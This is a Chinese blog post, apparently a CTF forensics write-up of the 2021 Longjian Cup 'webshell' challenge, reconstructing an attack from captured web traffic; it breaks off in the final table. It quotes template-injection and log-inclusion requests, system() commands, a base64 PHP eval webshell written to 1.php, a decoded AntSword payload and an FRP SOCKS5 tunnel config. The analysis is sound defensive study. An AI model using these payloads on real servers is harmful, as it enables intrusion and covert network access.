{"id":1079,"date":"2026-04-01T19:41:41","date_gmt":"2026-04-01T11:41:41","guid":{"rendered":"http:\/\/shr1mp.top\/?p=1079"},"modified":"2026-04-13T13:11:14","modified_gmt":"2026-04-13T05:11:14","slug":"%e9%99%87%e5%89%91%e6%9d%af-2021webshell","status":"publish","type":"post","link":"http:\/\/shr1mp.top\/index.php\/2026\/04\/01\/%e9%99%87%e5%89%91%e6%9d%af-2021webshell\/","title":{"rendered":"[\u9647\u5251\u676f 2021]webshell"},"content":{"rendered":"\n
\u8fd9\u7bc7\u535a\u5ba2\u6211\u4ee5\u505a\u9898\u7684\u89c6\u89d2\u5148\u8fdb\u884c\u590d\u73b0\u8fd8\u539f\uff0c\u518d\u4ee5\u7eaf\u7cb9\u5206\u6790\u7684\u89d2\u5ea6\u5bf9\u8fd9\u4e2a\u6d41\u91cf\u8fdb\u884c\u5206\u6790\uff0c\u5e0c\u671b\u5404\u4f4d\u5927\u4f6c\u4eec\u591a\u591a\u6279\u8bc4\u6307\u6b63<\/pre>\n\n\n\n
\u4e00\u95ee<\/h2>\n\n\n\n
\n
\u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c\u8bf7\u60a8\u4ece\u6d41\u91cf\u4e2d\u5206\u6790\u51fawebshell\uff0c\u8fdb\u884c\u56de\u7b54\uff1a
\u9ed1\u5ba2\u767b\u5f55\u7cfb\u7edf\u4f7f\u7528\u7684\u5bc6\u7801\u662f_<\/em><\/strong><\/em><\/strong>\u3002\u3002<\/p>\n<\/blockquote>\n\n\n\n
\u521d\u6b65\u5206\u6790\u6d41\u91cf\uff0c\u662fhttp\u534f\u8bae\u7684\u653b\u51fb\uff0c\u7b2c\u4e00\u95ee\u76f4\u63a5\u641c\u7d22<\/p>\n\n\n\n
http contains \"password\"<\/code><\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\n
<\/p>\n<\/blockquote>\n\n\n\n
\u4e8c\u95ee<\/h2>\n\n\n\n
\n
\u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c\u8bf7\u60a8\u4ece\u6d41\u91cf\u4e2d\u5206\u6790\u51fawebshell\uff0c\u8fdb\u884c\u56de\u7b54\uff1a
\u9ed1\u5ba2\u4fee\u6539\u4e86\u4e00\u4e2a\u65e5\u5fd7\u6587\u4ef6\uff0c\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84\u4e3a_<\/em><\/strong><\/em><\/strong>\u3002\uff08\u8bf7\u786e\u8ba4\u7edd\u5bf9\u8def\u5f84\u540e\u518d\u63d0\u4ea4\uff09\u3002<\/p>\n<\/blockquote>\n\n\n\n
\u8ffd\u8e2a\u4e00\u95ee\u4e2d\u7684http\u6d41\uff0c\u53d1\u73b0\u662f\u7b2c6\u4e2a\u6d41\uff0c\u6211\u4eec\u63a5\u7740\u5206\u6790<\/p>\n\n\n\n
\uff08\u4e2a\u4eba\u5206\u6790\uff09\u767b\u5f55\u8d26\u53f7\u5bc6\u7801\u540e\uff0c\u653b\u51fb\u8005\u5728\u6839\u76ee\u5f55\u4e0b\u641c\u7d22png\u6587\u4ef6...\u7531\u4e8e\u8fd9\u91cc\u9700\u8981\u627e\u7684\u662f\u4fee\u6539\u7684\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u76f4\u63a5\u8fc7\u6ee4\u51fapost\u8bf7\u6c42\u7684\u6d41\u91cf<\/p>\n\n\n\n
http.request.method==POST<\/code><\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\u627e\u5230\u4e00\u4e2a\u8def\u5f84\uff0c<\/p>\n\n\n\n
Form item: \"tpl\" = \"data\/Runtime\/Logs\/Home\/21_08_07.log\"<\/code><\/pre>\n\n\n\n
\u4f46\u662f\u8fd9\u662f\u76f8\u5bf9\u8def\u5f84\uff0c\u6211\u4eec\u8981\u627e\u7684\u662f\u7edd\u5bf9\u8def\u5f84\uff0c\u6211\u4eec\u63a5\u7740\u5f80\u540e\u770bpost\u8bf7\u6c42\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u6267\u884c\u4e00\u4e9b\u7cfb\u7edf\u6307\u4ee4\uff0c\u5728\u540e\u9762\u4e00\u70b9\uff0c\u6709\u4e00\u4e2aecho\u6307\u4ee4<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\u5728\u8fd9\u4e2a\u6307\u4ee4\u91cc\uff0c\u53ef\u4ee5\u770b\u5230 \u5199\u5165\u6728\u9a6c\uff1a<\/p>\n\n\n\n
system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > \/var\/www\/html\/1.php');<\/code><\/pre>\n\n\n\n
\u6240\u4ee5\u53ef\u4ee5\u5f97\u5230\u6211\u4eec\u60f3\u8981\u7684\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84\uff1a<\/p>\n\n\n\n
\/var\/www\/html\/data\/Runtime\/Logs\/Home\/21_08_07.log<\/code><\/pre>\n\n\n\n
\u4e09\u95ee<\/h2>\n\n\n\n
\n
\u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c\u8bf7\u60a8\u4ece\u6d41\u91cf\u4e2d\u5206\u6790\u51fawebshell\uff0c\u8fdb\u884c\u56de\u7b54\uff1a
\u9ed1\u5ba2\u83b7\u53d6webshell\u4e4b\u540e\uff0c\u6743\u9650\u662f__<\/strong>\uff1f\u5f97\u5230\u7684flag\u8bf7\u4f7f\u7528NSSCTF{}\u683c\u5f0f\u63d0\u4ea4\u3002<\/p>\n<\/blockquote>\n\n\n\n
\u5148\u7531\u7b2c\u4e8c\u4e2a\u95ee\u6709\u4e2a ' whoami ' \u6307\u4ee4<\/p>\n\n\n\n
\u7136\u540e\u8fd4\u56de\u7684\u662f\u65e5\u5fd7\u9519\u8bef\u4fe1\u606f\uff1b<\/p>\n\n\n\n
ERR: ...............:.\/Application\/Home\/View\/default\/www-data<\/code><\/pre>\n\n\n\n
\u5176\u4e2dwww-data<\/code>\u5373\u4e3awhoami<\/code>\u547d\u4ee4\u7684\u6267\u884c\u7ed3\u679c\uff0c\u8868\u660e\u5f53\u524d Web \u670d\u52a1\u4ee5www-data<\/code>\u7528\u6237\u8fd0\u884c\u3002<\/p>\n\n\n\n
\u6240\u4ee5\u6743\u9650\u662f<\/p>\n\n\n\n
www-data<\/code><\/pre>\n\n\n\n
\u56db\u95ee<\/h2>\n\n\n\n
\n
\u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c\u8bf7\u60a8\u4ece\u6d41\u91cf\u4e2d\u5206\u6790\u51fawebshell\uff0c\u8fdb\u884c\u56de\u7b54\uff1a
\u9ed1\u5ba2\u5199\u5165\u7684webshell\u6587\u4ef6\u540d\u662f_<\/em><\/strong><\/em><\/strong>\u3002(\u8bf7\u63d0\u4ea4\u5e26\u6709\u6587\u4ef6\u540e\u7f00\u7684\u6587\u4ef6\u540d\uff0c\u4f8b\u5982x.txt)\u3002\u5f97\u5230\u7684flag\u8bf7\u4f7f\u7528NSSCTF{}\u683c\u5f0f\u63d0\u4ea4\u3002<\/p>\n<\/blockquote>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\u524d\u9762\u8fd9\u91cc\u5df2\u7ecf\u627e\u5230\u4e86<\/p>\n\n\n\n
1.php<\/code><\/pre>\n\n\n\n
\u4e94\u95ee<\/h2>\n\n\n\n
\n
\u5355\u4f4d\u7f51\u7ad9\u88ab\u9ed1\u5ba2\u6302\u9a6c\uff0c\u8bf7\u60a8\u4ece\u6d41\u91cf\u4e2d\u5206\u6790\u51fawebshell\uff0c\u8fdb\u884c\u56de\u7b54\uff1a
\u9ed1\u5ba2\u4e0a\u4f20\u7684\u4ee3\u7406\u5de5\u5177\u5ba2\u6237\u7aef\u540d\u5b57\u662f_<\/em><\/strong><\/em><\/strong>\u3002\uff08\u5982\u6709\u5b57\u6bcd\u8bf7\u5168\u90e8\u4f7f\u7528\u5c0f\u5199\uff09\u3002\u5f97\u5230\u7684flag\u8bf7\u4f7f\u7528NSSCTF{}\u683c\u5f0f\u63d0\u4ea4\u3002<\/p>\n<\/blockquote>\n\n\n\n
\u8ffd\u8e2a\u6d41\u53d1\u73b0frpc.ini<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
FRP \u5de5\u5177<\/strong>\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n
    \n
  • frpc<\/code> \u662f FRP\uff08Fast Reverse Proxy\uff09\u7684\u5ba2\u6237\u7aef\u7ec4\u4ef6\uff0c\u7528\u4e8e\u5b9e\u73b0\u5185\u7f51\u7a7f\u900f\u3002<\/li>\n\n\n\n
  • .ini<\/code> \u6587\u4ef6\u901a\u5e38\u4f5c\u4e3a FRP \u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u5305\u542b\u670d\u52a1\u5668\u5730\u5740\u3001\u7aef\u53e3\u3001\u4ee3\u7406\u89c4\u5219\u7b49\u4fe1\u606f\u3002<\/li>\n\n\n\n
  • \u5728\u6e17\u900f\u6d4b\u8bd5\u6216\u653b\u51fb\u573a\u666f\u4e2d\uff0c\u653b\u51fb\u8005\u5e38\u4e0a\u4f20 FRP \u5ba2\u6237\u7aef\u4ee5\u5efa\u7acb\u53cd\u5411\u4ee3\u7406\uff0c\u7a81\u7834\u5185\u7f51\u9650\u5236\u3002<\/li>\n\n\n\n
  • <\/li>\n<\/ul>\n\n\n\n
    \u516d\u95ee<\/h2>\n\n\n\n
    \n
    \u9ed1\u5ba2\u4ee3\u7406\u5de5\u5177\u7684\u56de\u8fde\u670d\u52a1\u7aefip\u662f_\u3002<\/p>\n<\/blockquote>\n\n\n\n
    \u5728\u6d4138\u4e2d\u6709\u6bb5<\/p>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    16\u8fdb\u5236\u89e3\u7801\uff1a<\/p>\n\n\n\n
    [common]\nserver_addr = 192.168.239.123\nserver_port = 7778\ntoken=Xa3BJf2l5enmN6Z7A8mv\n\n[test_sock5]\ntype = tcp\nremote_port =8111\nplugin = socks5\nplugin_user = 0HDFt16cLQJ\nplugin_passwd = JTN276Gp\nuse_encryption = true\nuse_compression = true\n<\/code><\/pre>\n\n\n\n
    \u6545\u800c\u627e\u5230\u6700\u7ec8ip\uff1a192.168.239.123<\/p>\n\n\n\n
    \u4e03\u95ee<\/h2>\n\n\n\n
    \n
    \u9ed1\u5ba2\u7684socks5\u7684\u8fde\u63a5\u8d26\u53f7\u3001\u5bc6\u7801\u662f__\u3002\uff08\u4e2d\u95f4\u4f7f\u7528#\u53f7\u9694\u5f00\uff0c\u4f8b\u5982admin#passwd\uff09<\/p>\n<\/blockquote>\n\n\n\n
    \u6839\u636e\u4e0a\u8ff0\u5206\u6790\u53ef\u4ee5\u5f97\u77e5\u4e3a\uff1a0HDFt16cLQJ#JTN276Gp<\/p>\n\n\n\n
    \u6574\u4e2a\u6d41\u7a0b\u5206\u6790<\/h2>\n\n\n\n
    \n
    \u501f\u52a9AI\u5e2e\u6211\u4e00\u8d77\u5206\u6790\u7684\uff0c\u6709\u4e0d\u597d\u7684\u5730\u65b9\u6b22\u8fce\u6307\u6b63<\/p>\n<\/blockquote>\n\n\n\n
    \u6d416\uff1a\u767b\u5f55<\/p>\n\n\n\n
    username=test&password=Admin123!%40%23&expire=0<\/code><\/pre>\n\n\n\n
    \u6d417-13\uff1a\u5168\u662fget\u8bf7\u6c42\uff0c\u4f3c\u4e4e\u5728\u68c0\u7d22\u76ee\u5f55\uff1f<\/p>\n\n\n\n
    \u6d4114\uff1a\u867d\u7136\u662fpost\uff0c\u4f46\u662f\u6ca1\u6709\u76f4\u63a5\u6027\u653b\u51fb<\/p>\n\n\n\n
    ai\u5206\u6790\uff1b\n\u7528\u6237\u64cd\u4f5c\uff1a\u4e0a\u4f20\u7b80\u5386\u56fe\u7247 \u2192 \u89e6\u53d1 OCR \u626b\u63cf\n\u7cfb\u7edf\u54cd\u5e94\uff1a\u542f\u52a8\u626b\u63cf\u4efb\u52a1\u76d1\u542c\npid=1\uff1a    \u5173\u8054\u5230\u62db\u8058\u8ba1\u5212\/\u9879\u76ee ID \u4e3a 1 \u7684\u804c\u4f4d<\/code><\/pre>\n\n\n\n
    \u6d4115-17\u300118-22\uff1a\u67e5\u770bPNG+\u7d22\u5f15\u6839\u76ee\u5f55\uff08\u65e0\u76f4\u63a5\u653b\u51fb\uff09<\/p>\n\n\n\n
    \u6d4123\uff1a\u8fd9\u662f\u4e00\u4e2a\u6a21\u677f\u6ce8\u5165\u6f0f\u6d1e\u653b\u51fb<\/strong>\uff0c\u9488\u5bf9 \u9a91\u58eb CMS\uff08QSCMS\uff09<\/strong> \u7684 company_show<\/code> \u6a21\u5757\u3002<\/p>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    \u867d\u7136\u662f404\uff0c\u4f46\u662f\u8fd9\u91cc\u7684 eval($_REQUEST[a])<\/code> \u653b\u51fb\u53ef\u80fd\u90e8\u5206\u6210\u529f<\/strong>\uff0c\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u4e86 ThinkPHP \u65e5\u5fd7\u6587\u4ef6<\/strong><\/p>\n\n\n\n
    \u6d4124\uff1a\u5f00\u59cb\u653b\u51fb\uff0c\u4f46\u662f\u53cd\u9988\u662f404<\/p>\n\n\n\n
    variable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&a=system('whoami');<\/code><\/pre>\n\n\n\n
    \u6d4125-28\uff1a\u653b\u51fb\uff08\u4e0d\u65ad\u8c03\u8bd5\u53c2\u6570\uff09\uff0c28\u7684\u65f6\u5019\u6210\u529f<\/p>\n\n\n\n
    25\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log
    \n\n26\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&a=1
    \n\n27\uff1avariable=1&tpl=\/r\/n
    \n\n28\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('whoami');

    <\/qscms><\/code><\/pre>\n\n\n\n
    \u6d4129-33\u653b\u51fb\uff1a<\/p>\n\n\n\n
    29\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('ipconfig');\n\n30\uff1bvariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('ifconfig');\n\n31\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('pwd');\n\n32\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d');\n\n33\uff1avariable=1&tpl=data\/Runtime\/Logs\/Home\/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > \/var\/www\/html\/1.php');\n<\/code><\/pre>\n\n\n\n
    \u5e8f\u53f7<\/th>\u6307\u4ee4<\/th>\u4f5c\u7528<\/th>\u653b\u51fb\u9636\u6bb5<\/th><\/tr><\/thead>
    29<\/strong><\/td>ipconfig<\/code><\/td>\u63a2\u6d4b Windows \u73af\u5883<\/strong><\/td>\u4fe1\u606f\u6536\u96c6<\/td><\/tr>
    30<\/strong><\/td>ifconfig<\/code><\/td>\u63a2\u6d4b Linux \u73af\u5883<\/strong><\/td>\u4fe1\u606f\u6536\u96c6<\/td><\/tr>
    31<\/strong><\/td>pwd<\/code><\/td>\u786e\u8ba4\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55<\/strong><\/td>\u4fe1\u606f\u6536\u96c6<\/td><\/tr>
    32<\/strong><\/td>base64 -d<\/code><\/td>\u6d4b\u8bd5\u89e3\u7801\u529f\u80fd<\/strong><\/td>\u51c6\u5907\u690d\u5165<\/td><\/tr>
    33<\/strong><\/td>base64 -d > \/var\/www\/html\/1.php<\/code><\/td>\u5199\u5165\u540e\u95e8\u6587\u4ef6<\/strong><\/td>\u6b66\u5668\u5316\u90e8\u7f72<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
    \u6d4135\uff1a\uff08\u63a5\u4e0b\u676536\u300137\u5747\u4ee5\u89e3\u7801\u5f62\u5f0f\u7ed9\u51fa\uff09<\/p>\n\n\n\n
    aaa=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22bc%22.%220f2%22%3Becho%20%40asenc(%24output)%3Becho%20%22f797e%22.%22322e0%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B<\/code><\/pre>\n\n\n\n
    URL\u89e3\u7801\uff1a\n@ini_set(\"display_errors\", \"0\");\n@set_time_limit(0);\n\nfunction asenc($out){\n    return $out;\n};\n\nfunction asoutput(){\n    $output=ob_get_contents();\n    ob_end_clean();\n    echo \"bc\".\"0f2\";           \/\/ \u524d\u7f00\u5206\u9694\u7b26\uff1abc0f2\n    echo @asenc($output);       \/\/ \u52a0\u5bc6\/\u7f16\u7801\u540e\u7684\u8f93\u51fa\n    echo \"f797e\".\"322e0\";       \/\/ \u540e\u7f00\u5206\u9694\u7b26\uff1af797e322e0\n};\n\nob_start();\n\ntry{\n    $D=dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n    if($D==\"\") $D=dirname($_SERVER[\"PATH_TRANSLATED\"]);\n    $R=\"{$D}\\t\";                \/\/ \u5f53\u524d\u8def\u5f84 + Tab\n    \n    if(substr($D,0,1)!=\"\/\"){    \/\/ Windows \u7cfb\u7edf\n        foreach(range(\"C\",\"Z\")as $L)\n            if(is_dir(\"{$L}:\")) $R.=\"{$L}:\";\n        $R.=\"\\t\";\n    }else{\n        $R.=\"\/\\t\";              \/\/ Linux \u7cfb\u7edf\n    }\n    \n    $u=(function_exists(\"posix_getegid\"))?@posix_getpwuid(@posix_geteuid()):\"\";\n    $s=($u)?$u[\"name\"]:@get_current_user();\n    $R.=php_uname();            \/\/ \u7cfb\u7edf\u4fe1\u606f\n    $R.=\"\\t{$s}\";              \/\/ \u5f53\u524d\u7528\u6237\n    echo $R;                    \/\/ \u8f93\u51fa\uff1a\u8def\u5f84  \u76d8\u7b26  \u7cfb\u7edf\u4fe1\u606f  \u7528\u6237\u540d\n    \n}catch(Exception $e){\n    echo \"ERROR:\/\/\".$e->getMessage();\n};\n\nasoutput();\ndie();<\/code><\/pre>\n\n\n\n
    \u901a\u8fc7@ini_set(\"display_errors\", \"0\");@set_time_limit(0);\u53d1\u73b0\u8fd9\u662fAntsword<\/p>\n\n\n\n
    \u53e6\u5916\u8fd8\u53ef\u4ee5\u53cd\u5e94\u662f\u8681\u5251\u7684\u51e0\u4e2a\u7279\u5f81\uff1a<\/p>\n\n\n\n
    1\u3001\u54cd\u5e94\u5305\u683c\u5f0f\u7531\u968f\u673a\u6570\u4f5c\u4e3a\u5b9a\u754c\u7b26\u5305\u88f9\u7ed3\u679c<\/p>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    2\u3001\u82e5\u4f7f\u7528\u4e86\u52a0\u5bc6\u7b49\u63d2\u4ef6\u7ed5\u8fc7\u7684\u8bdd\uff0c\u52a0\u5bc6\u540e\u7684\u6570\u636e\u6ca1\u7528\u4ec0\u4e48\u7279\u522b\u660e\u663e\u7684\u4e86\uff0c\u4f46\u662f\u8681\u5251\u6df7\u6dc6\u52a0\u5bc6\u540e\u8fd8\u6709\u4e00\u4e2a\u6bd4\u8f83\u660e\u663e\u7684\u7279\u5f81\uff0c\u53c2\u6570\u5927\u591a\u4ee5\u201c_0x\u2026..=\u201d\u8fd9\u79cd\u5f62\u5f0f\uff0c\u4ee5_0x\u5f00\u5934\u7684\u53c2\u6570\u540d\uff0c\u8fd9\u4e2a\u53ef\u80fd\u4e5f\u53ef\u4ee5\u6362\u5176\u4ed6\u7684\u56fa\u5b9a\u5b57\u7b26\uff0c\u53ef\u4ee5\u627e\u51fa\u89c4\u5f8b<\/p>\n\n\n\n
    36\uff1a\/\/ \u83b7\u53d6\u5f53\u524d\u8def\u5f84\n$D = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n\n\/\/ \u5224\u65ad\u7cfb\u7edf\u7c7b\u578b\uff08Windows\/Linux\uff09\nif(substr($D,0,1) != \"\/\") {\n    \/\/ Windows\uff1a\u679a\u4e3e C: \u5230 Z: \u76d8\u7b26\n    foreach(range(\"C\",\"Z\") as $L)\n        if(is_dir(\"{$L}:\")) $R .= \"{$L}:\";\n} else {\n    $R .= \"\/\";  \/\/ Linux\n}\n\n\/\/ \u83b7\u53d6\u5f53\u524d\u7528\u6237\u4fe1\u606f\n$u = (function_exists(\"posix_getegid\")) \n     ? @posix_getpwuid(@posix_geteuid()) \n     : \"\";\n$s = ($u) ? $u[\"name\"] : @get_current_user();\n\n\/\/ \u8f93\u51fa\uff1a\u8def\u5f84 + \u76d8\u7b26 + \u7cfb\u7edf\u4fe1\u606f + \u7528\u6237\u540d\n$R .= php_uname();\n$R .= \"\\t{$s}\";\necho $R;\n\n\n\n\n\n=================================================================\n37\uff1a\/\/ \u83b7\u53d6\u76ee\u5f55\u8def\u5f84\uff08\u4ece POST \u53c2\u6570 j68071301598f\uff09\n$D = base64_decode(substr($_POST[\"j68071301598f\"], 2));\n        \u2193\n    \u53bb\u6389\u524d2\u5b57\u7b26 \"wl\" \u2192 Base64\u89e3\u7801 \u2192 \/var\/www\/html\/\n\n\/\/ \u6253\u5f00\u76ee\u5f55\n$F = @opendir($D);\n\n\/\/ \u904d\u5386\u76ee\u5f55\nwhile($N = @readdir($F)) {\n    $P = $D . $N;                    \/\/ \u5b8c\u6574\u8def\u5f84\n    $T = @date(\"Y-m-d H:i:s\", ...);  \/\/ \u4fee\u6539\u65f6\u95f4\n    $E = substr(base_convert(@fileperms($P),10,8),-4); \/\/ \u6743\u9650\uff08\u5982 0755\uff09\n    $R = \"\\t\" . $T . \"\\t\" . @filesize($P) . \"\\t\" . $E . \"\\n\";\n    \n    if(@is_dir($P)) \n        $M .= $N . \"\/\" . $R;         \/\/ \u76ee\u5f55\u6536\u96c6\u5230 $M\n    else \n        $L .= $N . $R;               \/\/ \u6587\u4ef6\u6536\u96c6\u5230 $L\n}\n\necho $M . $L;  \/\/ \u5148\u8f93\u51fa\u76ee\u5f55\uff0c\u518d\u8f93\u51fa\u6587\u4ef6\n\n\n\n\n==============================================================================\n38\uff1a\u914d\u7f6eFPR\n| \u914d\u7f6e\u9879               | \u503c                     | \u8bf4\u660e                |\n| ----------------- | --------------------- | ----------------- |\n| `server_addr`     | `192.168.239.123`     | **FRP\u670d\u52a1\u7aef\uff08\u653b\u51fb\u8005\u63a7\u5236\uff09** |\n| `server_port`     | `7778`                | FRP\u670d\u52a1\u7aef\u53e3           |\n| `token`           | `Xa3BJf2l5enmN6ZA8mv` | \u8fde\u63a5\u8ba4\u8bc1\u4ee4\u724c            |\n| `[test_sock5]`    | \u96a7\u9053\u540d\u79f0                  | SOCKS5\u4ee3\u7406\u96a7\u9053        |\n| `remote_port`     | `8111`                | \u8fdc\u7a0b\u76d1\u542c\u7aef\u53e3            |\n| `plugin`          | `socks5`              | **\u5efa\u7acbSOCKS5\u4ee3\u7406**    |\n| `plugin_user`     | `0HDFt16cLQJ`         | \u4ee3\u7406\u8ba4\u8bc1\u7528\u6237\u540d           |\n| `plugin_passwd`   | `JTN276Gp`            | \u4ee3\u7406\u8ba4\u8bc1\u5bc6\u7801            |\n| `use_encryption`  | `true`                | \u542f\u7528\u52a0\u5bc6              |\n| `use_compression` | `true`                | \u542f\u7528\u538b\u7f29              |\n\n\u89e3\u91ca\uff1a\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510         \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510         \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502   \u653b\u51fb\u8005\u673a\u5668     \u2502 \u2190\u2500\u2500\u2500\u2500\u2192 \u2502  \u76ee\u6807\u670d\u52a1\u5668\uff08\u53d7\u5bb3\uff09 \u2502 \u2190\u2500\u2500\u2500\u2500\u2192 \u2502   \u5185\u7f51\u5176\u4ed6\u673a\u5668   \u2502\n\u2502 192.168.239.123 \u2502  FRP    \u2502  \u8fd0\u884c frpc.ini   \u2502  SOCKS5 \u2502   \u6570\u636e\u5e93\/\u57df\u63a7\u7b49  \u2502\n\u2502   FRP\u670d\u52a1\u7aef      \u2502  7778   \u2502  8111\u7aef\u53e3\u8f6c\u53d1    \u2502  \u4ee3\u7406   \u2502                \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518         \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518         \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n                    \u2191\n            \u901a\u8fc7WebShell\u5199\u5165\u914d\u7f6e\u5e76\u542f\u52a8FRP\u5ba2\u6237\u7aef\n                    \u2193\n            \u5efa\u7acb\u52a0\u5bc6\u96a7\u9053\uff0c\u7a7f\u900f\u5185\u7f51\u8fb9\u754c\n\n\n\n\n============================================================================\n39\uff1a\u5728\u6b64\u76ee\u5f55\u64cd\u4f5c\nj68071301598f=hML3Zhci93d3cvaHRtbC8%3D\n                \u2193 URL\u89e3\u7801\n            hML3Zhci93d3cvaHRtbC8=\n                \u2193 Base64\u89e3\u7801\uff08\u53bb\u6389\u524d2\u5b57\u7b26\"hM\"\uff09\n            \/var\/www\/html\/\n\n\n\n====================================================================================<\/code><\/pre>\n\n\n\n
    \u5c0f\u7ed3\uff1a\u653b\u51fb\u8005\u64cd\u4f5c\u6d41\u7a0b<\/h2>\n\n\n\n
    \u65f6\u95f4<\/th>\u64cd\u4f5c<\/th>\u76ee\u7684<\/th><\/tr><\/thead>
    20:35<\/strong><\/td>\u9996\u6b21\u5c1d\u8bd5\u6a21\u677f\u6ce8\u5165 eval($_REQUEST[a])<\/code><\/td>\u63a2\u6d4b\u6f0f\u6d1e<\/td><\/tr>
    20:43-20:48<\/strong><\/td>\u6b63\u5e38\u4e1a\u52a1\u8bf7\u6c42\uff08\u5e72\u6270\/\u63a9\u62a4\uff09<\/td>\u6df7\u6dc6\u6d41\u91cf<\/td><\/tr>
    20:51<\/strong><\/td>\u518d\u6b21\u5c1d\u8bd5\u6a21\u677f\u6ce8\u5165 $_GET['id']<\/code><\/td>\u6301\u7eed\u63a2\u6d4b<\/td><\/tr>
    21:00<\/strong><\/td>\u8f6c\u5411LFI\uff0c\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/td>\u6218\u672f\u8f6c\u53d8<\/td><\/tr>
    21:12<\/strong><\/td>\u5c1d\u8bd5\u7ed5\u8fc7\uff0c\u53c2\u6570\u6539\u4e3a aaa<\/code><\/td>\u7ed5\u8fc7\u8fc7\u6ee4<\/td><\/tr>
    21:21<\/strong><\/td>\u786e\u8ba4LFI\u6210\u529f<\/strong>\uff08OK vs 404\u5bf9\u6bd4\uff09<\/td>\u6f0f\u6d1e\u786e\u8ba4<\/strong><\/td><\/tr>
    21:22<\/strong><\/td>\u6267\u884cipconfig<\/code>\/ifconfig<\/code>\/pwd<\/code><\/td>\u73af\u5883\u63a2\u6d4b<\/td><\/tr>
    21:22<\/strong><\/td>\u690d\u5165\u540e\u95e8<\/strong> 1.php<\/code>\uff08Base64\u89e3\u7801\u5199\u5165\uff09<\/td>\u6743\u9650\u83b7\u53d6<\/strong><\/td><\/tr>
    21:25<\/strong><\/td>\u8681\u5251\u8fde\u63a5<\/strong>\uff0c\u4fe1\u606f\u6536\u96c6<\/td>\u5efa\u7acb\u63a7\u5236<\/td><\/tr>
    21:28-29<\/strong><\/td>\u83dc\u5200\u5c1d\u8bd5\u8fde\u63a5\uff08\u5e72\u6270\u6216\u5907\u9009\uff09<\/td>\u591a\u5de5\u5177\u5c1d\u8bd5<\/td><\/tr>
